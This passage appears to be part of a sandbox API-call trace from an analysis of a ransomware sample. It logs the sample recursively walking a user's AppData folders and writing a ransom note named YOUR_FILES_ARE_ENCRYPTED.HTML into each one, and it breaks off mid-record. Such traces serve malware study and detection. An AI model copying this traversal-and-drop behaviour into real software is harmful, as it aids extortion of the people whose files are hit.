(lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\SharedCacheContainers\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoftedge\\sharedcachecontainers\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.316] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.316] CloseHandle (hObject=0x320) returned 1 [0114.316] GetProcessHeap () returned 0x600000 [0114.316] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.316] GetProcessHeap () returned 0x600000 [0114.317] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.320] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4278a87, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4278a87, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4278a87, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="SharedCacheContainers", cAlternateFileName="SHARED~1")) returned 0 [0114.321] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.321] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0114.321] GetProcessHeap () returned 0x600000 [0114.321] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MicrosoftEdge\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoftedge\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0114.321] WriteFile (in: hFile=0x30c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0114.322] CloseHandle (hObject=0x30c) returned 1 [0114.322] GetProcessHeap () returned 0x600000 [0114.322] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.322] GetProcessHeap () returned 0x600000 [0114.322] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0114.323] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Packages", cAlternateFileName="")) returned 1 [0114.323] StrStrIW (lpFirst="Packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.323] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages") returned 48 [0114.323] GetProcessHeap () returned 0x600000 [0114.323] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0114.324] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages" [0114.324] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\*" [0114.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0114.324] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 1 [0114.325] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x451c66d8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x451c66d8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.3DBuilder_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.3DB")) returned 1 [0114.325] StrStrIW (lpFirst="Microsoft.3DBuilder_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.325] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe") returned 82 [0114.325] GetProcessHeap () returned 0x600000 [0114.325] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.326] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe" [0114.326] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\*" [0114.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x451c66d8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x451c66d8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0114.329] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x451c66d8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x451c66d8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.329] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x40803b20, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40a8c136, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40a8c136, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0114.329] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.329] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC") returned 85 [0114.329] GetProcessHeap () returned 0x600000 [0114.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.330] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC" [0114.330] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\*" [0114.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x40803b20, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40a8c136, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40a8c136, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName=".", cAlternateFileName="")) returned 0x626838 [0114.332] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x40803b20, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40a8c136, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40a8c136, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 1 [0114.332] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0114.332] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.332] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache") returned 95 [0114.332] GetProcessHeap () returned 0x600000 [0114.332] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.333] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache" [0114.333] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache\\*" [0114.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.334] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName="..", cAlternateFileName="")) returned 1 [0114.334] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName="..", cAlternateFileName="")) returned 0 [0114.334] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.334] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0114.334] GetProcessHeap () returned 0x600000 [0114.334] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.335] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.336] CloseHandle (hObject=0x324) returned 1 [0114.336] GetProcessHeap () returned 0x600000 [0114.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.336] GetProcessHeap () returned 0x600000 [0114.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.336] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0114.336] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.336] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies") returned 97 [0114.336] GetProcessHeap () returned 0x600000 [0114.337] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.338] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies" [0114.338] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0114.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.338] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName="..", cAlternateFileName="")) returned 1 [0114.338] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName="..", cAlternateFileName="")) returned 0 [0114.338] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.338] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0114.338] GetProcessHeap () returned 0x600000 [0114.338] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.339] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.340] CloseHandle (hObject=0x324) returned 1 [0114.340] GetProcessHeap () returned 0x600000 [0114.340] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.340] GetProcessHeap () returned 0x600000 [0114.340] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.341] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0114.341] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.341] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory") returned 97 [0114.341] GetProcessHeap () returned 0x600000 [0114.341] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.342] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory" [0114.342] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0114.342] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.342] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, 